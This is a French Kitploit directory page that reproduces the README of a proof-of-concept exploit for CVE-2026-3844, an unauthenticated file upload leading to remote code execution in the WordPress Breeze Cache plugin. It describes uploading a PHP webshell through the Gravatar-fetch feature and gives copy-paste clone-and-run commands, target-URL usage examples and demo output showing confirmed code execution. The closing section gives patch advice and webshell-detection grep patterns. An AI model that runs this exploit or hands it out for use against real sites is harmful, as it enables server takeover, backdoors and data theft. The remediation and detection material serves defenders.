Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-3844 — Exploit PoC pour CVE-2026-3844, une vulnérabilité critique de téléversement de fichiers sans authentification dans le plugin WordPress Breeze menant à une RCE. | Kitploit
Outils/GitHubGitHub/tausifzaman/cve-2026-3844
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubtausifzaman/cve-2026-3844

CVE-2026-3844

Exploit PoC pour CVE-2026-3844, une vulnérabilité critique de téléversement de fichiers sans authentification dans le plugin WordPress Breeze menant à une RCE.

Voir le dépôt
33il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-3844

Exploit PoC pour CVE-2026-3844, une vulnérabilité critique de téléversement de fichier sans authentification dans le plugin WordPress Breeze menant à une RCE.

CVE-2026-3844 SVG de frappe

CVE ID CVSS Score CWE Python WordPress Platform

PoC
Author


📌 Vue d'ensemble

CVE-2026-3844 est une vulnérabilité CRITIQUE de téléversement arbitraire de fichier sans authentification dans le plugin WordPress Breeze Cache (par Cloudways), affectant toutes les versions jusqu'à la 2.4.4 incluse.

Ce dépôt fournit un exploit Proof of Concept (PoC) (CVE-2026-3844.py) pour la recherche en sécurité autorisée, les tests d'intrusion et la divulgation responsable.


Code en une ligne

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3

📊 Résumé de la vulnérabilité

ChampDétails
ID CVECVE-2026-3844
PluginBreeze Cache (par Cloudways)
Versions affectéesToutes les versions ≤ 2.4.4
Version corrigéeBreeze 2.4.5+
Type de vulnérabilitéCWE-434 — Téléversement sans restriction de fichier de type dangereux
Score CVSS v3.19.8 (CRITIQUE)
Score CVSS v2.010.0 (CRITIQUE)
Vecteur CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vecteur d'attaqueRéseau (à distance)
Authentification requise❌ Aucune — Non authentifiée
Condition"Host Files Locally – Gravatars" doit être activée (désactivée par défaut)
ImpactConfidentialité : ÉLEVÉE · Intégrité : ÉLEVÉE · Disponibilité : ÉLEVÉE
Publié2026-04-23
SourceWordfence / NVD / MITRE
PoCTausif Zaman

🔍 Détails de la vulnérabilité

Cause racine

Le plugin Breeze Cache pour WordPress récupère les images Gravatar distantes et les stocke localement lorsque la fonctionnalité "Host Files Locally – Gravatars" est activée. La fonction vulnérable fetch_gravatar_from_remote dans class-breeze-cache-cronjobs.php (lignes 89–119) n'effectue aucune validation du type de fichier ou de l'extension sur le contenu distant récupéré.

root@kitploit:~
class-breeze-cache-cronjobs.php
  └── fetch_gravatar_from_remote()   ← ❌ No file type validation
        └── Saves remote content directly to disk
              └── Attacker controls → uploads .php webshell → RCE

Déroulement de l'attaque

root@kitploit:~
Attacker (Unauthenticated)
    │
    ▼
Craft malicious HTTP request with PHP webshell URL as Gravatar
    │
    ▼
Plugin fetches & saves the .php file without validation
    │
    ▼
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
    │
    ▼
Attacker accesses webshell → Full RCE achieved

Impact

En cas d'exploitation réussie, un attaquant peut :

  • 🔴 Exécuter des commandes arbitraires du système d'exploitation (RCE)
  • 🔴 Téléverser des backdoors / webshells persistants
  • 🔴 Créer des comptes administrateur WordPress frauduleux
  • 🔴 Exfiltrer des bases de données, des identifiants et des fichiers sensibles
  • 🔴 Défigurer le site web ou supprimer tout le contenu
  • 🔴 Utiliser le serveur comme point de pivot vers d'autres systèmes du même réseau
  • 🔴 Enrôler le serveur dans un botnet

⚙️ Prérequis

  • Python 3.6+
  • bibliothèque requests
  • Site cible exécutant Breeze Cache ≤ 2.4.4 avec "Host Files Locally – Gravatars" activée

🚀 Installation et configuration

🐧 Linux / Termux (Android)

root@kitploit:~
# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3 CVE-2026-3844.py

# Navigate into the directory
cd CVE-2026-3844

# Install dependencies
pip install -r requirements.txt

# Run the exploit
python3 CVE-2026-3844.py

🪟 Windows (CMD / PowerShell)

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py

🍎 macOS

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py

🤖 Termux (En une ligne)

root@kitploit:~
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py

☁️ Google Cloud Shell (Aucune configuration requise)

Open in Cloud Shell

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py

💻 Utilisation

root@kitploit:~
python3 CVE-2026-3844.py

Options

root@kitploit:~
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]

CVE-2026-3844 — Breeze Cache WordPress Plugin Arbitrary File Upload PoC

optional arguments:
  -h, --help              Show this help message and exit
  -u URL, --url URL       Target URL (e.g. https://target.com)
  -t TIMEOUT              Request timeout in seconds (default: 10)
  -o OUTPUT               Save webshell path to output file
  -v, --verbose           Enable verbose/debug output

Exemples

root@kitploit:~
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com

# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v

# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v

🖥️ Sortie de démonstration du PoC

root@kitploit:~
╔══════════════════════════════════════════════════════╗
║          CVE-2026-3844 | Breeze Cache WP RCE        ║
║          Researcher: tausifzaman.online              ║
╚══════════════════════════════════════════════════════╝

[*] Target     : https://vulnerable-site.com
[*] CVE        : CVE-2026-3844
[*] Plugin     : Breeze Cache ≤ 2.4.4
[*] Type       : Unauthenticated Arbitrary File Upload → RCE
[*] Checking target...

[+] Breeze Cache plugin detected!
[+] "Host Files Locally – Gravatars" is ENABLED
[*] Uploading PHP webshell via fetch_gravatar_from_remote...
[+] File uploaded successfully!
[+] Webshell path: /wp-content/breeze-cache/avatar_a1b2c3.php
[*] Verifying RCE...
[+] RCE CONFIRMED!

[+] Command output (id):
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Full server compromise achieved.
[*] Cleanup: Remove /wp-content/breeze-cache/avatar_a1b2c3.php after testing.

🔒 Atténuation et remédiation

✅ Action immédiate

Mettez à jour Breeze Cache vers la version 2.4.5 ou ultérieure — c'est la seule correction complète.

root@kitploit:~
# WordPress CLI — update Breeze plugin immediately
wp plugin update breeze

🛡️ Atténuations temporaires (si vous ne pouvez pas mettre à jour immédiatement)

  1. Désactivez l'option "Host Files Locally – Gravatars" dans les paramètres de Breeze Cache
  2. Bloquez le point de terminaison vulnérable via une règle WAF ou .htaccess
  3. Interdisez l'exécution de PHP dans les répertoires uploads et cache :
root@kitploit:~
# Add to /wp-content/uploads/.htaccess and /wp-content/cache/.htaccess
<FilesMatch "\.php$">
    deny from all
</FilesMatch>
  1. Recherchez les fichiers suspects récemment créés/modifiés :
root@kitploit:~
# Find recently modified PHP files in wp-content (possible webshells)
find /var/www/html/wp-content -name "*.php" -newer /var/www/html/wp-config.php -ls

# Search for common webshell indicators
grep -r "eval(base64_decode" /var/www/html/wp-content/
grep -r "system\|exec\|passthru\|shell_exec" /var/www/html/wp-content/cache/
  1. Bloquez les requêtes POST suspectes ciblant la fonctionnalité de récupération des Gravatar via votre WAF
  2. Surveillez les journaux d'accès pour les requêtes vers /wp-content/breeze-cache/*.php
root@kitploit:~
# Monitor Apache/Nginx access logs for webshell hits
grep "breeze-cache.*\.php" /var/log/apache2/access.log
grep "breeze-cache.*\.php" /var/log/nginx/access.log

🔍 Vérifier si le site est déjà compromis

root@kitploit:~
# Check for unexpected PHP files in Breeze cache directory
find /var/www/html/wp-content/breeze-cache/ -name "*.php"

# Check for recently created files (last 7 days)
find /var/www/html/wp-content/ -name "*.php" -mtime -7

# Look for admin accounts created recently (run in wp-mysql)
SELECT user_login, user_registered FROM wp_users ORDER BY user_registered DESC LIMIT 10;

📚 Références

SourceLien
🔗 NVD (NIST)nvd.nist.gov/vuln/detail/CVE-2026-3844
🔗 MITRE CVEcve.mitre.org – CVE-2026-3844
🔗 Avis Wordfencewordfence.com – Threat Intel
🔗 Journal des modifications du plugin WordPressplugins.trac.wordpress.org/changeset/3511463/breeze
🔗 Code vulnérable (L89)class-breeze-cache-cronjobs.php#L89
🔗 Code vulnérable (L119)class-breeze-cache-cronjobs.php#L119
🔗 Avis GitHubGHSA-c529-q7mw-hq6j
🔗 Dépôt du PoCgithub.com/tausifzaman/CVE-2026-3844

👤 Auteur

Tausif Zaman

🌐 tausifzaman.online  ·  🐙 GitHub @tausifzaman

Chercheur en sécurité · Chasseur de bugs · Développeur d'outils

Android · Python · PHP · Sécurité web · Tests d'intrusion


⚠️ Avertissement légal

Ce dépôt et le code d'exploitation qu'il contient sont fournis strictement à des fins éducatives et de recherche en sécurité autorisée uniquement.

  • ✅ Vous pouvez utiliser cet outil sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de tester
  • ❌ Toute utilisation non autorisée contre des systèmes tiers est illégale en vertu du Computer Fraud and Abuse Act (CFAA), du Computer Misuse Act et des lois équivalentes dans le monde entier
  • L'auteur décline toute responsabilité en cas d'utilisation abusive, de dommages ou d'activités illégales résultant de cet outil

Piratez éthiquement. Signalez de manière responsable. Restez dans la légalité. 🛡️


⭐ Si cela a aidé vos recherches, mettez une étoile au dépôt ! ⭐

Star   Follow   Website

Télécharger l’outil